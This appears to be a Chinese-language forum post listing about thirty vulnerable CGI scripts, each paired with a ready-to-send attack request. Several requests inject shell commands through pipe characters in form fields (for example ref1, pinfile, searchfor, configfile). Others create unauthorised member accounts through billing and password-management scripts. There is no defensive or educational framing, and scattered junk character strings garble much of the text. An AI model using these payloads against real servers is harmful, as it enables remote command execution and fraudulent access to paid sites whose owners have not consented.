Cgi-bin 30个漏洞＋使用方法

admin

==============================

/smspass.pl
4 Z2 D3 `  l1 vusername=username&password=password

/ Q& J( P" W9 B; O7 {1 C. N9 b2 S  @4 j/index.cgi
wei=ren&gen=command
+ s7 s7 i5 O; ~8 R; F# P
9 q: H9 Q0 x# G- ]. Z1 g/passmaster.cgi
: G9 F$ v5 j" f5 d/ Z9 e5 EAction=Add&Username=Username&Password=Password

+ ]9 A, j" o: e& i% O- g/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
1 L& ], x8 t; I5 \7 H
* W! U/ }+ ~" M7 u( V- T4 R( y/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|

/addusr.pl
0 i' J/ a1 ~" J1 V/ `8 k/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password

; N% c3 {8 D: G# d# P. w6 b  X/ccbill-local.asp
post_values=username:password
% ^# o6 l1 m# m$ o/ n* F
& v* y7 |: }: V8 j' i& \) G/count.cgi
1 n$ ^$ Q1 a. Q: \, lpinfile=|echo;ls -la;exit|
7 G" p# l" L0 c! l
/recon.cgi
. H$ r0 x- J8 _/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|

/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>

" H$ \# b) N) B  p* @/af.cgi
_browser_out=|echo;ls -la;exit;|
7 k2 }9 @. B. j- P1 {' h
2 Y, S0 V( s) n6 ?0 C: a/modify.cgi
username=username&password=password&expire=30

/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|
; B7 z/ D8 M9 q: @- T! I
9 N1 F* A. e6 q. \& [* _/gx9passwd.cgi
0 O5 y0 G+ |4 |: \! t3 h; W$ J- Z& hcmd=ADD&user=username&pass=password
3 m: H- [( H( h/ Z
8 w0 u- d& p3 z* j+ V/probecontrol.cgi
. @( B' n- l9 {+ v7 lcommand=enable&username=username&password=password
* D" y' z* O% L
/recon.cgi
# o7 R8 J0 z; U! J: t9 i* Q: ~searchoption=3&searchfor=echo;ls -la;exit
6 [( [% x+ ^5 v3 J$ z& D/ z
, ]4 U  }# K- O7 q. }/htadd.pl
" A/ K! T2 s0 r" hconfigfile=|echo; ls -alt; exit
) ^- W7 b  t0 n' \2 ^
/gx9passwd.cgi
cmd=ADD&user=username&pass=password

& W8 h; b4 @  ]$ n9 K/ibill*.pl
% {' i! I: B* s( o% Areqtype=add&authpwd=authpwd&username=username&password=password

/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)
- Z# y, T# h8 J/ j. T2 F* g& a
/globill_ut.cgi
do=add&username=username&password=password&wpassword=password
% L* k1 F4 M7 h1 y8 N% F. D
2 w9 N% s0 F, F9 t; u; s/usercontrol.cgi
command=enable&username=USER&password=PASS

/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

0 L1 N. I% i$ g+ e8 ?/addusr.pl
user=USER&pass=PASS&confirm=PASS

/pincount.cgi
  P. ~( x) [' F. C# r$ S/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|
$ V9 G: n9 y) h3 C+ Y3 d% A
* u8 I& U* f3 \2 u. l/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
& c7 r  ?- Z$ {0 k4 l5 Y5 h* B" p  ]username=username&password=password&password2=password&ref1=|echo;ls -al;exit
! o3 g6 I( L4 b5 W. z4 I
1 r. R6 }4 q0 q$ [" j0 p* ~/af.cgi
! {( f6 ]  o0 c3 R6 Z5 N' F/env.cgi
4 ~' ?, \- W$ S4 J$ l! Q, F( J% VADD+;echo;pwd;exit
% C& x: i; c: a  o. Y* h2 s1 [
/count.cgi
: |: p: f/ q, K" s! ^4 m" [. Spinfile=|echo;pwd;exit|
+ Z! x/ @9 a+ k% E
1 ?% }0 J) W1 ~- k/recon.cgi
0 T1 z$ m. B9 J/ U4 T0 K+ v" lsearchoption=1&searchfor=|echo;ls%20-al;exit|
" f4 C/ ?; Q- @! l9 F9 b' c
- l0 j! P; z- c! ]. v/add.cgi
username=username&password=password&expire=30
( R( T, e( _5 o0 B  t/ X
==============================